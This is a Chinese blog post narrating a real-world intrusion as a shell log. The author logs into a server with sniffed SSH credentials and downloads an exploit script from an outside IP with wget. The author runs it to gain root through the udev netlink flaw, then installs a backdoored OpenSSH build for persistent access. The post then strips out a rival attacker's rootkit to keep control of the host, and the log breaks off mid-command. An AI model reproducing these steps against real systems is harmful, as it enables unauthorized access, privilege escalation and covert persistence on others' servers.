blog:blog.securitycn.net
今天发现一台肉鸡上有人用ssh连到另外一台服务器，并被记录下了密码
[root@mail ~]# cat /tmp/sshpswd
ldc:[email protected]
直接ssh上去
[root@mail ~]# ssh [email protected]
[email protected]'s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r _disibledevent=>http://211.100.50.70/u.sh
--13:21:09-- http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：3366 (3.3K) [application/x-sh]
Saving to: `u.sh'
100%[=>] 3,366 --.-K/s in 0.04s
13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]
[ldc@localhost .v]$ ls
r00t r00t.c u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
f69f8800 0 2486 00000111 0 0 00000000 2
f7fdae00 0 0 00000000 0 0 00000000 2
c2132200 6 0 00000000 0 0 00000000 2
f6a57a00 7 2143 00000001 0 0 00000000 2
f7caf000 7 0 00000000 0 0 00000000 2
f6a0be00 9 2143 00000000 0 0 00000000 2
f6a61200 9 1996 00000000 0 0 00000000 2
f7de1c00 9 0 00000000 0 0 00000000 2
f7d6ca00 10 0 00000000 0 0 00000000 2
f7fb3200 11 0 00000000 0 0 00000000 2
c2154200 15 476 ffffffff 0 0 00000000 2
f7fdac00 15 0 00000000 0 0 00000000 2
f7fb3000 16 0 00000000 0 0 00000000 2
c21cde00 18 0 00000000 0 0 00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 在函数 ‘main’ 中：
suid.c:3: 警告：隐式声明与内建函数 ‘execl’ 不兼容
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High
已经是root权限了
sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
我们先留个ssh后门
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08-- http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：979990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz'
100%[=>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(省略若干行)
sh-3.1# make && make
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
/bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............(省略若干行)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
停止 sshd： [确定]
启动 sshd： [确定]
ok了，用我们的sshdoor登录
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:Low-High
[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
总感觉这系统怪怪的，连22端口都看不到，应该是netstat被替换了。先看看有没有其他被替换掉的系统文件吧：
[root@localhost ~]# rpm -qaV
S.5..UG. /bin/netstat
S.5..UG. /sbin/config
S.5....T /usr/bin/ssh-keygen
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5..UG. /usr/sbin/lsof
.M...... /var/tux
S.5....T c /etc/inittab
S.5....T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T /usr/share/texmf-var/web2c/aleph.fmt
S.5....T /usr/share/texmf-var/web2c/amstex.fmt
S.5....T /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T /usr/share/texmf-var/web2c/bplain.fmt
S.5....T /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T /usr/share/texmf-var/web2c/etex.fmt
..5....T /usr/share/texmf-var/web2c/metafun.mem
S.5....T /usr/share/texmf-var/web2c/mf.base
..5....T /usr/share/texmf-var/web2c/mpost.mem
S.5....T /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T /usr/share/texmf-var/web2c/omega.fmt
S.5....T /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T /usr/share/texmf-var/web2c/pdftex.fmt
S.5....T /usr/share/texmf-var/web2c/tex.fmt
.......T c /etc/kdump.conf
S.5....T c /etc/prcap
..5....T c /etc/pki/nssdb/secmod.db
....L... c /etc/pam.d/system-auth
.M...... c /etc/cups/es.conf
.......T c /etc/audit/auditd.conf
missing /usr/sbin/nscd
S.5....T c /etc/sysconfig/named
.M...... /var/named
SM5..UG. /bin/ps
SM5..UG. /usr/bin/top
SM5....T c /etc/sysconfig/iptables-config
S.5..UG. /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?..... /usr/lib/libGL.so.1.2
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
S.5....T c /etc/ssh/ssh_config
S.5....T /usr/bin/scp
S.5....T /usr/bin/sftp
S.5....T /usr/bin/ssh
S.5....T /usr/bin/ssh-add
SM5...GT /usr/bin/ssh-agent
S.5....T /usr/bin/ssh-keyscan
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T /etc/sgml/docbook-slides.cat
S.5....T /usr/share/icons/hicolor/icon-theme.cache
S.5..UG. /bin/ls
S.5..UG. /usr/bin/dir
S.5..UG. /usr/bin/md5sum
S.5..UG. /usr/bin/pstree
S.5....T c /etc/syslog.conf
S.5....T c /etc/ssh/sshd_config
S.5....T /usr/sbin/sshd
missing /var/lib/texmf/ls-R
S.5....T /etc/sgml/docbook-simple.cat
S.5....T c /etc/vsftpd/vsftpd.conf
.M...... /var/ftp/pub
S.5....T c /etc/mailcap
......G. /var/cache/samba/winbindd_privileged
.......T c /etc/mail/sendmail.cf
SM5....T c /etc/mail/submit.cf
S.5....T c /var/log/mail/statistics
..5....T c /usr/lib/security/path.security
S.5....T c /etc/sane.d/dll.conf
还好rpm没被替换。看来系统里好些命令被替换了，嘿嘿，有同行在啊。
不好意思，那我就要T你下去了。下面先检查一下：当然这个系统已经不可靠了，我们先把可靠的命令替换回来：
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted
被用chattr加了iau属性
[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
ok了看看还有什么吧:
[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia------- /sbin/config
s---ia------- /sbin/ttymon
s---ia------- /sbin/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/sbin/lsof
s---ia------- /usr/sbin/ttyload
s---ia------- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.
[root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat
同样方式把/usr/sbin/lsof、/usr/bin/find等都替换回来
再用netstat看看端口吧:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload (有东东出来了吧)
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
tcp 0 0 :::22 :::* LISTEN 13935/sshd
现在再用chkrootkit和rkhunter查下看看:
[root@loca